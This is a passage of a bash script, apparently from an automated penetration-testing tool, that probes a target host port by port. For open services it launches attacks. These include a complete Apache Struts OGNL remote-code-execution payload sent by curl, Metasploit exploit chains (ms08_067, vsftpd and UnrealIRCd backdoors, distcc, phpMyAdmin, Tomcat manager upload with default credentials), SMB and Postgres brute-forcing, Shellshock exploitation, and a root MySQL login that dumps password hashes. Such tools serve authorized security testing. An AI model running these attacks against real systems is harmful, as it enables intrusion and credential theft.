curl -s -H "Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" http://$TARGET | head -n 1
|
|
fi
|
|
|
|
if [ $SCAN_TYPE == "DOMAIN" ];
|
|
then
|
|
if [ "$GOOHAK" = "0" ]; then
|
|
echo -e "$OKGREEN + -- ----------------------------=[Skipping Google Hacking Queries]=-------------------- -- +$RESET"
|
|
else
|
|
echo -e "$OKGREEN + -- ----------------------------=[Running Google Hacking Queries]=--------------------- -- +$RESET"
|
|
goohak $TARGET > /dev/null
|
|
fi
|
|
echo -e "$OKGREEN + -- ----------------------------=[Running InUrlBR OSINT Queries]=---------- -- +$RESET"
|
|
php $INURLBR --dork "site:$TARGET" -s inurlbr-$TARGET.txt
|
|
rm -Rf output/ cookie.txt exploits.conf
|
|
GHDB="1"
|
|
fi
|
|
fi
|
|
|
|
if [ -z "$port_110" ];
|
|
then
|
|
echo -e "$OKRED + -- --=[Port 110 closed... skipping.$RESET"
|
|
else
|
|
echo -e "$OKORANGE + -- --=[Port 110 opened... running tests...$RESET"
|
|
nmap -A -sV -T5 --script=pop* -p 110 $TARGET
|
|
fi
|
|
|
|
if [ -z "$port_111" ];
|
|
then
|
|
echo -e "$OKRED + -- --=[Port 111 closed... skipping.$RESET"
|
|
else
|
|
echo -e "$OKORANGE + -- --=[Port 111 opened... running tests...$RESET"
|
|
showmount -a $TARGET
|
|
showmount -d $TARGET
|
|
showmount -e $TARGET
|
|
fi
|
|
|
|
if [ -z "$port_135" ];
|
|
then
|
|
echo -e "$OKRED + -- --=[Port 135 closed... skipping.$RESET"
|
|
else
|
|
echo -e "$OKORANGE + -- --=[Port 135 opened... running tests...$RESET"
|
|
rpcinfo -p $TARGET
|
|
nmap -A -p 135 -T5 --script=rpc* $TARGET
|
|
fi
|
|
|
|
if [ -z "$port_139" ];
|
|
then
|
|
echo -e "$OKRED + -- --=[Port 139 closed... skipping.$RESET"
|
|
else
|
|
echo -e "$OKORANGE + -- --=[Port 139 opened... running tests...$RESET"
|
|
SMB="1"
|
|
echo -e "$OKGREEN + -- ----------------------------=[Running SMB Enumeration]=----------------- -- +$RESET"
|
|
enum4linux $TARGET
|
|
python $SAMRDUMP $TARGET
|
|
nbtscan $TARGET
|
|
nmap -A -sV -T5 -p139 --script=smb-server-stats --script=smb-ls --script=smb-enum-domains --script=smbv2-enabled --script=smb-psexec --script=smb-enum-groups --script=smb-enum-processes --script=smb-brute --script=smb-print-text --script=smb-security-mode --script=smb-os-discovery --script=smb-enum-sessions --script=smb-mbenum --script=smb-enum-users --script=smb-enum-shares --script=smb-system-info --script=smb-vuln-ms10-054 --script=smb-vuln-ms10-061 $TARGET
|
|
msfconsole -x "use auxiliary/scanner/smb/pipe_auditor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use auxiliary/scanner/smb/pipe_dcerpc_auditor; run; use auxiliary/scanner/smb/psexec_loggedin_users; run; use auxiliary/scanner/smb/smb2; run; use auxiliary/scanner/smb/smb_enum_gpp; run; use auxiliary/scanner/smb/smb_enumshares; run; use auxiliary/scanner/smb/smb_enumusers; run; use auxiliary/scanner/smb/smb_enumusers_domain; run; use auxiliary/scanner/smb/smb_login; run; use auxiliary/scanner/smb/smb_lookupsid; run; use auxiliary/scanner/smb/smb_uninit_cred; run; use auxiliary/scanner/smb/smb_version; run; use exploit/linux/samba/chain_reply; run; use windows/smb/ms08_067_netapi; run; exit;"
|
|
fi
|
|
|
|
if [ -z "$port_161" ];
|
|
then
|
|
echo -e "$OKRED + -- --=[Port 161 closed... skipping.$RESET"
|
|
else
|
|
echo -e "$OKORANGE + -- --=[Port 161 opened... running tests...$RESET"
|
|
for a in `cat /usr/share/brutex/wordlists/snmp-strings.txt`; do snmpwalk $TARGET -c $a; done;
|
|
nmap -sU -p 161 --script=snmp* $TARGET
|
|
fi
|
|
|
|
if [ -z "$port_162" ];
|
|
then
|
|
echo -e "$OKRED + -- --=[Port 162 closed... skipping.$RESET"
|
|
else
|
|
echo -e "$OKORANGE + -- --=[Port 162 opened... running tests...$RESET"
|
|
for a in `cat /usr/share/brutex/wordlists/snmp-strings.txt`; do snmpwalk $TARGET -c $a; done;
|
|
nmap -A -p 162 -Pn --script=snmp* $TARGET
|
|
fi
|
|
|
|
if [ -z "$port_389" ];
|
|
then
|
|
echo -e "$OKRED + -- --=[Port 389 closed... skipping.$RESET"
|
|
else
|
|
echo -e "$OKORANGE + -- --=[Port 389 opened... running tests...$RESET"
|
|
nmap -A -p 389 -Pn -T5 --script=ldap* $TARGET
|
|
fi
|
|
|
|
if [ -z "$port_443" ];
|
|
then
|
|
echo -e "$OKRED + -- --=[Port 443 closed... skipping.$RESET"
|
|
else
|
|
echo -e "$OKORANGE + -- --=[Port 443 opened... running tests...$RESET"
|
|
echo -e "$OKGREEN + -- ----------------------------=[Checking for WAF]=------------------------ -- +$RESET"
|
|
wafw00f https://$TARGET
|
|
echo ""
|
|
echo -e "$OKGREEN + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +$RESET"
|
|
whatweb https://$TARGET
|
|
echo ""
|
|
echo -e "$OKGREEN + -- ----------------------------=[Gathering SSL/TLS Info]=------------------ -- +$RESET"
|
|
sslyze --resum --certinfo=basic --compression --reneg --sslv2 --sslv3 --hide_rejected_ciphers $TARGET
|
|
sslscan --no-failed $TARGET
|
|
testssl $TARGET
|
|
echo ""
|
|
cd $PLUGINS_DIR/MassBleed
|
|
./massbleed $TARGET port 443
|
|
cd $INSTALL_DIR
|
|
echo -e "$OKGREEN + -- ----------------------------=[Checking HTTP Headers]=------------------- -- +$RESET"
|
|
echo -e "$OKBLUE+ -- --=[Checking if X-Content options are enabled on $TARGET...$RESET $OKORANGE"
|
|
curl -s --insecure -I https://$TARGET | egrep -i 'X-Content' | tail -n 10
|
|
echo ""
|
|
echo -e "$OKBLUE+ -- --=[Checking if X-Frame options are enabled on $TARGET...$RESET $OKORANGE"
|
|
curl -s --insecure -I https://$TARGET | egrep -i 'X-Frame' | tail -n 10
|
|
echo ""
|
|
echo -e "$OKBLUE+ -- --=[Checking if X-XSS-Protection header is enabled on $TARGET...$RESET $OKORANGE"
|
|
curl -s --insecure -I https://$TARGET | egrep -i 'X-XSS' | tail -n 10
|
|
echo ""
|
|
echo -e "$OKBLUE+ -- --=[Checking HTTP methods on $TARGET...$RESET $OKORANGE"
|
|
curl -s --insecure -I -X OPTIONS https://$TARGET | grep Allow
|
|
echo ""
|
|
echo -e "$OKBLUE+ -- --=[Checking if TRACE method is enabled on $TARGET...$RESET $OKORANGE"
|
|
curl -s --insecure -I -X TRACE https://$TARGET | grep TRACE
|
|
echo ""
|
|
echo -e "$OKBLUE+ -- --=[Checking for META tags on $TARGET...$RESET $OKORANGE"
|
|
curl -s --insecure https://$TARGET | egrep -i meta --color=auto | tail -n 10
|
|
echo ""
|
|
echo -e "$OKBLUE+ -- --=[Checking for open proxy on $TARGET...$RESET $OKORANGE"
|
|
curl -x https://$TARGET:443 -L https://crowdshield.com/.testing/openproxy.txt -s --insecure | tail -n 10
|
|
echo ""
|
|
echo -e "$OKBLUE+ -- --=[Enumerating software on $TARGET...$RESET $OKORANGE"
|
|
curl -s --insecure -I https://$TARGET | egrep -i "Server:|X-Powered|ASP|JSP|PHP|.NET" | tail -n 10
|
|
echo ""
|
|
echo -e "$OKBLUE+ -- --=[Checking if Strict-Transport-Security is enabled on $TARGET...$RESET $OKORANGE"
|
|
curl -s --insecure -I https://$TARGET/ | egrep -i "Strict-Transport-Security" | tail -n 10
|
|
echo ""
|
|
echo -e "$OKBLUE+ -- --=[Checking for Flash cross-domain policy on $TARGET...$RESET $OKORANGE"
|
|
curl -s --insecure https://$TARGET/crossdomain.xml | tail -n 10
|
|
echo ""
|
|
echo -e "$OKBLUE+ -- --=[Checking for Silverlight cross-domain policy on $TARGET...$RESET $OKORANGE"
|
|
curl -s --insecure https://$TARGET/clientaccesspolicy.xml | tail -n 10
|
|
echo ""
|
|
echo -e "$OKBLUE+ -- --=[Checking for HTML5 cross-origin resource sharing on $TARGET...$RESET $OKORANGE"
|
|
curl -s --insecure -I https://$TARGET | egrep -i "Access-Control-Allow-Origin" | tail -n 10
|
|
echo ""
|
|
echo -e "$OKBLUE+ -- --=[Retrieving robots.txt on $TARGET...$RESET $OKORANGE"
|
|
curl -s --insecure https://$TARGET/robots.txt | tail -n 10
|
|
echo ""
|
|
echo -e "$OKBLUE+ -- --=[Retrieving sitemap.xml on $TARGET...$RESET $OKORANGE"
|
|
curl -s --insecure https://$TARGET/sitemap.xml | tail -n 10
|
|
echo ""
|
|
echo -e "$OKBLUE+ -- --=[Checking cookie attributes on $TARGET...$RESET $OKORANGE"
|
|
curl -s --insecure -I https://$TARGET | egrep -i "Cookie:" | tail -n 10
|
|
echo ""
|
|
echo -e "$OKBLUE+ -- --=[Checking for ASP.NET Detailed Errors on $TARGET...$RESET $OKORANGE"
|
|
curl -s --insecure https://$TARGET/%3f.jsp | egrep -i 'Error|Exception' | tail -n 10
|
|
curl -s --insecure https://$TARGET/test.aspx -L | egrep -i 'Error|Exception|System.Web.' | tail -n 10
|
|
echo ""
|
|
echo -e "$RESET"
|
|
echo -e "$OKGREEN + -- ----------------------------=[Running Web Vulnerability Scan]=---------- -- +$RESET"
|
|
nikto -h https://$TARGET
|
|
echo -e "$OKGREEN + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +$RESET"
|
|
cutycapt --url=https://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port443.jpg
|
|
echo -e "$OKRED[+]$RESET Screenshot saved to $LOOT_DIR/screenshots/$TARGET-port443.jpg"
|
|
|
|
if [ "$MODE" = "web" ];
|
|
then
|
|
echo -e "$OKGREEN + -- ----------------------------=[Running NMap HTTP Scripts]=--------------- -- +$RESET"
|
|
nmap -A -sV -T5 -Pn -p 443 --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse --script=/usr/share/nmap/scripts/iis-buffer-overflow.nse --script=http-enum,http-headers,http-server-header,http-php-version,http-iis-webdav-vuln,http-vuln-*,http-phpmyadmin-dir-traversal $TARGET
|
|
echo -e "$OKGREEN + -- ----------------------------=[Running Directory Brute Force]=----------- -- +$RESET"
|
|
dirb https://$TARGET
|
|
echo -e "$OKGREEN + -- ----------------------------=[Running Wordpress Vulnerability Scans]=--- -- +$RESET"
|
|
wpscan --url https://$TARGET --batch
|
|
echo ""
|
|
wpscan --url https://$TARGET/wordpress/ --batch
|
|
echo -e "$OKGREEN + -- ----------------------------=[Running CMSMap]=-------------------------- -- +$RESET"
|
|
python $CMSMAP -t https://$TARGET
|
|
echo ""
|
|
python $CMSMAP -t https://$TARGET/wordpress/
|
|
echo ""
|
|
if [ $ARACHNI == "1" ];
|
|
then
|
|
echo -e "$OKGREEN + -- ----------------------------=[Skipping Arachni Scan]=------------------- -- +$RESET"
|
|
else
|
|
echo -e "$OKGREEN + -- ----------------------------=[Running Arachni Web Application Scan]=---- -- +$RESET"
|
|
mkdir -p $INSTALL_DIR/loot/web/$TARGET-https/ 2> /dev/null
|
|
arachni --report-save-path=$INSTALL_DIR/loot/web/$TARGET-https/ --output-only-positives https://$TARGET
|
|
cd $INSTALL_DIR/loot/web/$TARGET-https/
|
|
arachni_reporter $INSTALL_DIR/loot/web/$TARGET-https/*.afr --report=html:outfile=$INSTALL_DIR/loot/web/$TARGET-https/arachni.zip
|
|
unzip $INSTALL_DIR/loot/web/$TARGET-https/arachni.zip
|
|
cd $INSTALL_DIR
|
|
fi
|
|
echo -e "$OKGREEN + -- ----------------------------=[Running SQLMap SQL Injection Scan]=------- -- +$RESET"
|
|
sqlmap -u "https://$TARGET" --batch --crawl=5 --level 1 --risk 1 -f -a
|
|
echo -e "$OKGREEN + -- ----------------------------=[Running PHPMyAdmin Metasploit Exploit]=--- -- +$RESET"
|
|
msfconsole -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RPORT 443; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/http/phpmyadmin_preg_replace; run; exit;"
|
|
echo -e "$OKGREEN + -- ----------------------------=[Running ShellShock Auto-Scan Exploit]=---- -- +$RESET"
|
|
python $PLUGINS_DIR/shocker/shocker.py -H $TARGET --cgilist $PLUGINS_DIR/shocker/shocker-cgi_list --port 443 --ssl
|
|
echo -e "$OKGREEN + -- ----------------------------=[Running Apache Jakarta RCE Exploit]=------ -- +$RESET"
|
|
curl -s -H "Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" https://$TARGET | head -n 1
|
|
fi
|
|
|
|
if [ $SCAN_TYPE == "DOMAIN" ];
|
|
then
|
|
if [ -z $GHDB ];
|
|
then
|
|
if [ "$GOOHAK" = "0" ]; then
|
|
echo -e "$OKGREEN + -- ----------------------------=[Skipping Google Hacking Queries]=-------------------- -- +$RESET"
|
|
else
|
|
echo -e "$OKGREEN + -- ----------------------------=[Running Google Hacking Queries]=--------------------- -- +$RESET"
|
|
goohak $TARGET > /dev/null
|
|
fi
|
|
echo -e "$OKGREEN + -- ----------------------------=[Running InUrlBR OSINT Queries]=----------- -- +$RESET"
|
|
php $INURLBR --dork "site:$TARGET" -s inurlbr-$TARGET.txt
|
|
rm -Rf output/ cookie.txt exploits.conf
|
|
fi
|
|
fi
|
|
fi
|
|
|
|
if [ -z "$port_445" ];
|
|
then
|
|
echo -e "$OKRED + -- --=[Port 445 closed... skipping.$RESET"
|
|
elif [ $SMB = "1" ];
|
|
then
|
|
echo -e "$OKRED + -- --=[Port 445 scanned... skipping.$RESET"
|
|
else
|
|
echo -e "$OKORANGE + -- --=[Port 445 opened... running tests...$RESET"
|
|
enum4linux $TARGET
|
|
python $SAMRDUMP $TARGET
|
|
nbtscan $TARGET
|
|
nmap -A -sV -Pn -T5 -p445 --script=smb-server-stats --script=smb-ls --script=smb-enum-domains --script=smbv2-enabled --script=smb-psexec --script=smb-enum-groups --script=smb-enum-processes --script=smb-brute --script=smb-print-text --script=smb-security-mode --script=smb-os-discovery --script=smb-enum-sessions --script=smb-mbenum --script=smb-enum-users --script=smb-enum-shares --script=smb-system-info --script=smb-vuln-ms10-054 --script=smb-vuln-ms10-061 $TARGET
|
|
msfconsole -x "use auxiliary/scanner/smb/pipe_auditor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use auxiliary/scanner/smb/pipe_dcerpc_auditor; run; use auxiliary/scanner/smb/psexec_loggedin_users; run; use auxiliary/scanner/smb/smb2; run; use auxiliary/scanner/smb/smb_enum_gpp; run; use auxiliary/scanner/smb/smb_enumshares; run; use auxiliary/scanner/smb/smb_enumusers; run; use auxiliary/scanner/smb/smb_enumusers_domain; run; use auxiliary/scanner/smb/smb_login; run; use auxiliary/scanner/smb/smb_lookupsid; run; use auxiliary/scanner/smb/smb_uninit_cred; run; use auxiliary/scanner/smb/smb_version; run; use exploit/linux/samba/chain_reply; run; use windows/smb/ms08_067_netapi; run; exit;"
|
|
fi
|
|
|
|
if [ -z "$port_512" ];
|
|
then
|
|
echo -e "$OKRED + -- --=[Port 512 closed... skipping.$RESET"
|
|
else
|
|
echo -e "$OKORANGE + -- --=[Port 512 opened... running tests...$RESET"
|
|
nmap -A -sV -Pn -T5 -p 512 --script=rexec* $TARGET
|
|
fi
|
|
|
|
if [ -z "$port_513" ]
|
|
then
|
|
echo -e "$OKRED + -- --=[Port 513 closed... skipping.$RESET"
|
|
else
|
|
echo -e "$OKORANGE + -- --=[Port 513 opened... running tests...$RESET"
|
|
nmap -A -sV -T5 -Pn -p 513 --script=rlogin* $TARGET
|
|
fi
|
|
|
|
if [ -z "$port_514" ];
|
|
then
|
|
echo -e "$OKRED + -- --=[Port 514 closed... skipping.$RESET"
|
|
else
|
|
echo -e "$OKORANGE + -- --=[Port 514 opened... running tests...$RESET"
|
|
amap $TARGET 514 -A
|
|
fi
|
|
|
|
if [ -z "$port_623" ];
|
|
then
|
|
echo -e "$OKRED + -- --=[Port 623 closed... skipping.$RESET"
|
|
else
|
|
echo -e "$OKORANGE + -- --=[Port 623 opened... running tests...$RESET"
|
|
amap $TARGET 623 -A
|
|
nmap -A -sV -Pn -T5 --script=/usr/share/nmap/scripts/http-vuln-INTEL-SA-00075.nse -p 623 $TARGET
|
|
fi
|
|
|
|
if [ -z "$port_624" ];
|
|
then
|
|
echo -e "$OKRED + -- --=[Port 624 closed... skipping.$RESET"
|
|
else
|
|
echo -e "$OKORANGE + -- --=[Port 624 opened... running tests...$RESET"
|
|
amap $TARGET 624 -A
|
|
nmap -A -sV -Pn -T5 --script=/usr/share/nmap/scripts/http-vuln-INTEL-SA-00075.nse -p 624 $TARGET
|
|
fi
|
|
|
|
if [ -z "$port_1099" ];
|
|
then
|
|
echo -e "$OKRED + -- --=[Port 1099 closed... skipping.$RESET"
|
|
else
|
|
echo -e "$OKORANGE + -- --=[Port 1099 opened... running tests...$RESET"
|
|
amap $TARGET 1099 -A
|
|
nmap -A -sV -Pn -T5 -p 1099 --script=rmi-* $TARGET
|
|
msfconsole -x "use gather/java_rmi_registry; set RHOST "$TARGET"; run;"
|
|
msfconsole -x "use scanner/misc/java_rmi_server; set RHOST "$TARGET"; run;"
|
|
fi
|
|
|
|
if [ -z "$port_1433" ];
|
|
then
|
|
echo -e "$OKRED + -- --=[Port 1433 closed... skipping.$RESET"
|
|
else
|
|
echo -e "$OKORANGE + -- --=[Port 1433 opened... running tests...$RESET"
|
|
nmap -A -sV -Pn -T5 --script=ms-sql* -p 1433 $TARGET
|
|
fi
|
|
|
|
if [ -z "$port_2049" ];
|
|
then
|
|
echo -e "$OKRED + -- --=[Port 2049 closed... skipping.$RESET"
|
|
else
|
|
echo -e "$OKORANGE + -- --=[Port 2049 opened... running tests...$RESET"
|
|
nmap -A -sV -Pn -T5 --script=nfs* -p 2049 $TARGET
|
|
rpcinfo -p $TARGET
|
|
showmount -e $TARGET
|
|
smbclient -L $TARGET -U " "%" "
|
|
fi
|
|
|
|
if [ -z "$port_2121" ];
|
|
then
|
|
echo -e "$OKRED + -- --=[Port 2121 closed... skipping.$RESET"
|
|
else
|
|
echo -e "$OKORANGE + -- --=[Port 2121 opened... running tests...$RESET"
|
|
nmap -A -sV -Pn -T5 --script=ftp* -p 2121 $TARGET
|
|
msfconsole -x "setg PORT 2121; use exploit/unix/ftp/vsftpd_234_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use unix/ftp/proftpd_133c_backdoor; run; exit;"
|
|
fi
|
|
|
|
if [ -z "$port_3306" ];
|
|
then
|
|
echo -e "$OKRED + -- --=[Port 3306 closed... skipping.$RESET"
|
|
else
|
|
echo -e "$OKORANGE + -- --=[Port 3306 opened... running tests...$RESET"
|
|
nmap -A -sV -Pn --script=mysql* -p 3306 $TARGET
|
|
mysql -u root -h $TARGET -e 'SHOW DATABASES; SELECT Host,User,Password FROM mysql.user;'
|
|
fi
|
|
|
|
if [ -z "$port_3310" ];
|
|
then
|
|
echo -e "$OKRED + -- --=[Port 3310 closed... skipping.$RESET"
|
|
else
|
|
echo -e "$OKORANGE + -- --=[Port 3310 opened... running tests...$RESET"
|
|
nmap -A -p 3310 -Pn -T5 -sV --script clamav-exec $TARGET
|
|
fi
|
|
|
|
if [ -z "$port_3128" ];
|
|
then
|
|
echo -e "$OKRED + -- --=[Port 3128 closed... skipping.$RESET"
|
|
else
|
|
echo -e "$OKORANGE + -- --=[Port 3128 opened... running tests...$RESET"
|
|
nmap -A -p 3128 -Pn -T5 -sV --script=*proxy* $TARGET
|
|
fi
|
|
|
|
if [ -z "$port_3389" ];
|
|
then
|
|
echo -e "$OKRED + -- --=[Port 3389 closed... skipping.$RESET"
|
|
else
|
|
echo -e "$OKORANGE + -- --=[Port 3389 opened... running tests...$RESET"
|
|
nmap -A -sV -Pn -T5 --script=rdp-* -p 3389 $TARGET
|
|
rdesktop $TARGET &
|
|
fi
|
|
|
|
if [ -z "$port_3632" ];
|
|
then
|
|
echo -e "$OKRED + -- --=[Port 3632 closed... skipping.$RESET"
|
|
else
|
|
echo -e "$OKORANGE + -- --=[Port 3632 opened... running tests...$RESET"
|
|
nmap -A -sV -Pn -T5 --script=distcc-* -p 3632 $TARGET
|
|
msfconsole -x "setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; use unix/misc/distcc_exec; run; exit;"
|
|
fi
|
|
|
|
if [ -z "$port_8443" ];
|
|
then
|
|
echo -e "$OKRED + -- --=[Port 4443 closed... skipping.$RESET"
|
|
else
|
|
echo -e "$OKORANGE + -- --=[Port 4443 opened... running tests...$RESET"
|
|
wafw00f http://$TARGET:4443
|
|
echo ""
|
|
whatweb http://$TARGET:4443
|
|
echo ""
|
|
xsstracer $TARGET 4443
|
|
sslscan --no-failed $TARGET:4443
|
|
sslyze --resum --certinfo=basic --compression --reneg --sslv2 --sslv3 --hide_rejected_ciphers $TARGET:4443
|
|
cd $PLUGINS_DIR/MassBleed
|
|
./massbleed $TARGET port 4443
|
|
cd $INSTALL_DIR
|
|
nikto -h https://$TARGET:4443
|
|
cutycapt --url=https://$TARGET:4443 --out=$LOOT_DIR/screenshots/$TARGET-port4443.jpg
|
|
nmap -sV -Pn -A -p 4443 -T5 --script=*proxy* $TARGET
|
|
fi
|
|
|
|
if [ -z "$port_5432" ];
|
|
then
|
|
echo -e "$OKRED + -- --=[Port 5432 closed... skipping.$RESET"
|
|
else
|
|
echo -e "$OKORANGE + -- --=[Port 5432 opened... running tests...$RESET"
|
|
nmap -A -sV -Pn --script=pgsql-brute -p 5432 $TARGET
|
|
fi
|
|
|
|
if [ -z "$port_5800" ];
|
|
then
|
|
echo -e "$OKRED + -- --=[Port 5800 closed... skipping.$RESET"
|
|
else
|
|
echo -e "$OKORANGE + -- --=[Port 5800 opened... running tests...$RESET"
|
|
nmap -A -sV -Pn -T5 --script=vnc* -p 5800 $TARGET
|
|
fi
|
|
|
|
if [ -z "$port_5900" ];
|
|
then
|
|
echo -e "$OKRED + -- --=[Port 5900 closed... skipping.$RESET"
|
|
else
|
|
echo -e "$OKORANGE + -- --=[Port 5900 opened... running tests...$RESET"
|
|
nmap -A -sV -T5 --script=vnc* -p 5900 $TARGET
|
|
fi
|
|
|
|
if [ -z "$port_5984" ];
|
|
then
|
|
echo -e "$OKRED + -- --=[Port 5984 closed... skipping.$RESET"
|
|
else
|
|
echo -e "$OKORANGE + -- --=[Port 5984 opened... running tests...$RESET"
|
|
nmap -A -sV -Pn -T5 --script=couchdb* -p 5984 $TARGET
|
|
msfconsole -x "use auxiliary/scanner/couchdb/couchdb_enum; set RHOST "$TARGET"; run; exit;"
|
|
fi
|
|
|
|
if [ -z "$port_6000" ];
|
|
then
|
|
echo -e "$OKRED + -- --=[Port 6000 closed... skipping.$RESET"
|
|
else
|
|
echo -e "$OKORANGE + -- --=[Port 6000 opened... running tests...$RESET"
|
|
nmap -A -sV -Pn -T5 --script=x11* -p 6000 $TARGET
|
|
msfconsole -x "use auxiliary/scanner/x11/open_x11; set RHOSTS "$TARGET"; exploit;"
|
|
fi
|
|
|
|
if [ -z "$port_6667" ];
|
|
then
|
|
echo -e "$OKRED + -- --=[Port 6667 closed... skipping.$RESET"
|
|
else
|
|
echo -e "$OKORANGE + -- --=[Port 6667 opened... running tests...$RESET"
|
|
nmap -A -sV -Pn -T5 --script=irc* -p 6667 $TARGET
|
|
msfconsole -x "use unix/irc/unreal_ircd_3281_backdoor; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; run; exit;"
|
|
fi
|
|
|
|
if [ -z "$port_8000" ];
|
|
then
|
|
echo -e "$OKRED + -- --=[Port 8000 closed... skipping.$RESET"
|
|
else
|
|
echo -e "$OKORANGE + -- --=[Port 8000 opened... running tests...$RESET"
|
|
wafw00f http://$TARGET:8000
|
|
echo ""
|
|
whatweb http://$TARGET:8000
|
|
echo ""
|
|
xsstracer $TARGET 8000
|
|
cd ..
|
|
nikto -h http://$TARGET:8000
|
|
cutycapt --url=http://$TARGET:8000 --out=$LOOT_DIR/screenshots/$TARGET-port8000.jpg
|
|
nmap -sV -Pn --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse -A -p 8000 -T5 $TARGET
|
|
fi
|
|
|
|
if [ -z "$port_8100" ];
|
|
then
|
|
echo -e "$OKRED + -- --=[Port 8100 closed... skipping.$RESET"
|
|
else
|
|
echo -e "$OKORANGE + -- --=[Port 8100 opened... running tests...$RESET"
|
|
wafw00f http://$TARGET:8100
|
|
echo ""
|
|
whatweb http://$TARGET:8100
|
|
echo ""
|
|
xsstracer $TARGET 8100
|
|
sslscan --no-failed $TARGET:8100
|
|
cd $PLUGINS_DIR/MassBleed
|
|
./massbleed $TARGET port 8100
|
|
cd $INSTALL_DIR
|
|
nikto -h http://$TARGET:8100
|
|
cutycapt --url=http://$TARGET:8100 --out=$LOOT_DIR/screenshots/$TARGET-port8100.jpg
|
|
nmap -sV -Pn --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse -A -p 8100 -T5 $TARGET
|
|
fi
|
|
|
|
if [ -z "$port_8080" ];
|
|
then
|
|
echo -e "$OKRED + -- --=[Port 8080 closed... skipping.$RESET"
|
|
else
|
|
echo -e "$OKORANGE + -- --=[Port 8080 opened... running tests...$RESET"
|
|
wafw00f http://$TARGET:8080
|
|
echo ""
|
|
whatweb http://$TARGET:8080
|
|
echo ""
|
|
xsstracer $TARGET 8080
|
|
sslscan --no-failed $TARGET:8080
|
|
cd $PLUGINS_DIR/MassBleed
|
|
./massbleed $TARGET port 8080
|
|
cd $INSTALL_DIR
|
|
nikto -h http://$TARGET:8080
|
|
cutycapt --url=http://$TARGET:8080 --out=$LOOT_DIR/screenshots/$TARGET-port8080.jpg
|
|
nmap -sV -Pn --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse -A -p 8080 -T5 --script=*proxy* $TARGET
|
|
msfconsole -x "use admin/http/jboss_bshdeployer; setg RHOST "$TARGET"; run; use admin/http/tomcat_administration; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RPORT 8080; run; use admin/http/tomcat_utf8_traversal; run; use scanner/http/tomcat_enum; run; use scanner/http/tomcat_mgr_login; run; use multi/http/tomcat_mgr_deploy; run; use multi/http/tomcat_mgr_upload; set USERNAME tomcat; set PASSWORD tomcat; run; exit;"
|
|
# EXPERIMENTAL - APACHE STRUTS RCE EXPLOIT
|
|
# msfconsole -x "use exploit/linux/http/apache_struts_rce_2016-3081; setg RHOSTS "$TARGET"; set PAYLOAD linux/x86/read_file; set PATH /etc/passwd; run;"
|
|
fi
|
|
|
|
if [ -z "$port_8180" ];
|
|
then
|
|
echo -e "$OKRED + -- --=[Port 8180 closed... skipping.$RESET"
|
|
else
|
|
echo -e "$OKORANGE + -- --=[Port 8180 opened... running tests...$RESET"
|
|
wafw00f http://$TARGET:8180
|
|
echo ""
|
|
whatweb http://$TARGET:8180
|
|
echo ""
|
|
xsstracer $TARGET 8180
|
|
sslscan --no-failed $TARGET:8180
|
|
sslyze --resum --certinfo=basic --compression --reneg --sslv2 --sslv3 --hide_rejected_ciphers $TARGET:8180
|
|
cd $PLUGINS_DIR/MassBleed
|
|
./massbleed $TARGET port 8180
|
|
cd $INSTALL_DIR
|
|
nikto -h http://$TARGET:8180
|
|
cutycapt --url=http://$TARGET:8180 --out=$LOOT_DIR/screenshots/$TARGET-port8180.jpg
|
|
nmap -sV -Pn --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse -p 8180 -T5 --script=*proxy* $TARGET
|
|
echo -e "$OKGREEN + -- ----------------------------=[Launching Webmin File Disclosure Exploit]= -- +$RESET"
|
|
echo -e "$OKGREEN + -- ----------------------------=[Launching Tomcat Exploits]=--------------- -- +$RESET"
|
|
